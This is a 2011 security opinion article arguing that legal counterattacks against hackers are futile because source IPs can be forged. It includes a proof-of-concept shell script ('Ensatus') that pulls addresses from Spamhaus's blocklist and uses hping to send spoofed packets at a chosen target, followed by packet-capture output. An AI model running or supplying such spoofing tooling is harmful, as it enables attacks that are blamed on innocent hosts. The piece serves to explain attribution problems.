The Art of Cyber Warfare: Counterattack Fail

by J. Oquendo, infosecisland.com
April 19th 2011

Across the United States, we enjoy the protections of not only the Constitution but also our State constitutions which almost follow to the letter, the U.S. Constitution.

Using a snippet from the State of California we have: "All people are by nature free and independent and have inalienable rights. Among these are enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy."

Pennsylvania [2], Maine [3], New Hampshire [4], Idaho [5] and other states have similar, if not the same wording.

Following the words to the letter, how can we apply the same rights to today's rapid changing world of information security. With so many laws coming and going, I decided to take a walk on the wild side and legally claim that I can counter-hack an attacker.

To understand how will require a bit of skepticism and a desire to become case law, nevertheless, I will point out my reasoning for being able to counterattack a hacker trying to compromise my network. As with the information I will also point out why counterattacking will never work.

Initially I was not going to get into this topic, however I have received more and more e-mails this quarter concerning counterattacking. Personally, I see it as a pointless task littered with free tickets to club fed, however, hopefully someone in the legal realm could chime in with a counter article or commentary.

In trying to write this, I spent quite a few hours trying to track down a security incident that happened in the early 90's. The security incident involved someone in the military who had broken into another machine in the military. He was arrested, charged, but found not guilty of hacking.

You see, back then, banners were non-existent. He never had a warning telling him "thou shall not hack into thy superior's machines" therefore he skated away on a technicality. This led to the warning banners many systems and network administrators implement across machines [6] and while many may not know of the origin of this "pseudo-law," many practice creating "Warning Banners."

With the brief security history out of the way, there is no need to introduce the history of SLAs or TOS agreements, we just know that in order for our interconnections to work we will have an SLA and TOS in almost all businesses that dictate what both parties can and can't do and what they can or can't expect out of the partnership slash agreement.

Imagine the following banner for a moment:

$more /etc/motd

It is a simple and straightforward warning. In order for you to connect to me, you must allow my systems to check the weaknesses in your systems. As a partnership, this is actually beneficial as I could notify you of vulnerabilities before an attacker reaches them.

On the other hand, I am placing myself in harm's way via way of potential loss of clients, lawsuits from someone who did not read the TOS or SLAs not to mention the banner, higher rates from a carrier for potential excessive use of bandwidth, not to forget mentioning, interconnected peers and networks will not be happy about what appears to be an attack leaving my network which could lead to blacklisted.

Nevertheless, legally, I am covering myself with wording. Not only covering myself with my wording, but to a degree "enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy." As a provider of a service, I have the right to protect my privacy since it is my system, and the privacy of the data that reside on my systems.

Ironic how broadly some laws can be defined and interpreted. Because those laws are older than most computers, they are not necessarily applicable simply because they are not tested. Does this mean we should turn the Internet into the Wild Wild West? Not really unless you want to pursue a stint in federal prison while you either make or test case law.

Let us now imagine that this indeed was the case, one could counterattack based on an absurd TOS, SLA or other type of legal verbiage. "Counterattacking is now legal!!!" Game over. Not for you, not for me, not for the attacker. Rather, but for almost everyone who is interconnected, as it will be the equivalent of a constant "cyberdrive-by" shooting. With absolutely no winners, only losers.

Because counterattacking is legal (remember we're imaging it is), I reserve the right to perform a penetration test against anyone connecting to me. But who is exactly connecting to me. I will never be able to see who is behind an IP and therein lies the problem. I pointed this out in the "Decomposition Fail" chapter [7] on my "Art of Cyberwarfare" series. IP is not an identifier especially when it comes to "cyberwarfare."

To drive a point home, here is a concoction I whipped up called Ensatus. The purpose of Ensatus is to attack a target of my choice while picking out an already established bad guy and pretending to be that bad guy.

The sole purpose of Ensatus is deception and it drives the point of "fail" when it comes to counterattacking. If I were performing a sanctioned penetration test, there is a high likelihood that I would be using decoys. In the event counterattacking were legal, you would be counterattacking an innocent victim at that point.

# Ensatus v.0 (there will be no other versions...)
# J. Oquendo

# Proof of concept diversion/covertness generation script.
# Concept is simple, go out get a random "dirty host" via
# Spamhaus in this instance then use that host as a source
# of an attack. To be used while one is say performing a
# penetration test. The goal is simple to generate dirty
# traffic in an effort to "blend in with the crowd."

# Because I like ugly

ranport=$(( 1+( $(od -An -N2 -i /dev/random) )%(32-1+1) ))
sndport=`echo $ranport | sed 's:-::g' | sed -n '1p'`
pktsnum=$(( 500+( $(od -An -N2 -i /dev/random) )%(500-1+1) ))
rantarg=$((RANDOM%254+1))
randnet=`echo "sed -n '$rantarg" | sed 's:$:p'\'' /tmp/suckers:g'|sh`
suckers=/tmp/suckers

wget -qO - http://www.spamhaus.org/drop/drop.lasso | awk -F "/" '{print $1}' |\
sed 's:0$::g;s:$\.::g' > /tmp/suckers

if [ ! -f $sucker ];

then

wget -qO - http://www.spamhaus.org/drop/drop.lasso |\
awk -F "/" '{print $1}' | sed 's:0$::g;s:$\.::g' > /tmp/suckers

echo "Enter target"
read targeted

echo sending hping -8 $sndport -c $pktnum -a $randnet.$rantarg $targeted |sed 's:\.\.:\.:g'
echo "How many instances should we send out? (enter a number)"

read number

i="0"

while [ $i -lt 10 ]

echo hping -8 $sndport -c $sndport -i 100 -a $randnet.$rantarg $targeted |sed 's:\.\.:\.:g' |\ sh &

i=$[$i+1]

done

Does it work? From the attacker machine: (sanitized for a clean look)

root@axios:~/ENS# uname -a
Linux axios 2.6.29.4 #1 SMP Thu Jun 18 10:57:32 EDT 2009 i686 GNU/Linux

root@axios:~/ENS# ./ensatus.sh

Enter target
10.4.4.128

sending hping -8 24 -c -a 193.201.192.127 10.4.4.128

How many instances should we send out? (enter a number)

Scanning 10.4.4.128 (10.4.4.128), port 24

1 ports to scan, use -V to see all the replies

+----+-----------+---------+---+-----+-----+
|port| serv name | flags |ttl| id | win |
+----+-----------+---------+---+-----+-----+

root@axios:~/ENS#

On the victim end this is the output via Wireshark [8]:

root@chousen:/home/sil# uname -a
Linux chousen 2.6.35-27 SMP Tue Feb 22 20:25:29 UTC 2011 i686 GNU/Linux

root@chousen:/home/sil# tshark -i eth0 -R "ip.addr == 193.201.192.127" > OUT.txt
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0
^C20 packets captured

root@chousen:/home/sil# more OUT.txt
1.348529 193.201.192.127 -> 10.4.4.128   TCP rap-listen > 24 [] Seq=1 Win=512 Len=0
1.348576   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.356178 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#1] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.356196   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.386481 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#2] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.386502   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.464751 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#3] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.464780   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.554046 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#4] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.554074   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.596722 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#5] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.596748   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.607143 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#6] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.607164   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.648786 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#7] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.648805   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.724455 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#8] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.724499   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.740352 193.201.192.127 -> 10.4.4.128   TCP [TCP Dup ACK 18#9] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.740375   10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

Now, imagine if the victim machine were to counterattack, both sides lose. Not only would both sides lose, but everyone in between would lose as the victim would need to use bandwidth to counter, not to forget that the other side is also victim. If that side also had a counterattacking mechanism in place, you'd have the equivalent of a reflection between two mirrors, never ending.

We must remember that many attackers are never going to come from their true address. So what would be the point of even attempting to ever counterattacking or even creating an application or system that does so.

On the contrary, this will lead to more problems than one could ever wish for. Also, because of the flaws in the common structure of IP, it would be likely that attackers would endorse these absurd products. While these systems would be busy countering ghosts, an attacker would then have greater capabilities of blending in the crowd.

After all that has been written, I do believe that it would be possible to counterattack legally, however, it would be as absurd as believing that it would make an iota of a difference in either stopping an attacker, future attacks, deterring potential attackers, or even gathering any actionable information about a real attacker.

[1] http://www.leginfo.ca.gov/.const/.article_1
[2] http://www.the-patriot-s-voice.org/id18.html
[3] http://www.maine.gov/legis/const/Constitution2005-01.htm
[4] http://www.lonang.com/exlibris/organic/1784-nhr.htm
[5] http://www.sos.idaho.gov/elect/stcon/articl01.htm
[6] http://www.unixworks.net/papers/wp-007.pdf
[7] http://infiltrated.net/index.php?option=com_content&view=article&id=24&Itemid=30
[8] http://www.wireshark.org/